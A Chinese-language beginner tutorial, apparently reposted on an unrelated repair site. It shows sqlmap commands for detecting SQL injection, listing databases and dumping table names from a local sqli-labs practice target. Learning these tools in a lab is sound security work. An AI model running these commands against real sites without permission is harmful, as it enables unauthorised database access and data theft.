sqlmap漏洞扫描使用教程(入门+图文) |
您所在的位置:网站首页 › 查找网页漏洞的网站是什么 › sqlmap漏洞扫描使用教程(入门+图文) |
废话不多说,直接给兄弟们上干货 1.扫描网站 是否存在注入例 http://127.0.0.1/sqlilabs/Less-1/?id=1 只有一个参数,网址不用加双引号(如果参数大于1,网址必须加双引号) 1)检测是否存在注入sqlmap.py -u http://127.0.0.1/sqlilabs/Less-1/?id=1 2)存在注入则,查询当前用户下的所有数据库sqlmap.py -u http://127.0.0.1/sqlilabs/Less-1/?id=1 --dbs 3)获取其中一个数据库中的所有表名 以security数据库为例sqlmap.py -u http://127.0.0.1/sqlilabs/Less-1/?id=1 -D security --tables
|
CopyRight 2018-2019 办公设备维修网 版权所有 豫ICP备15022753号-3 |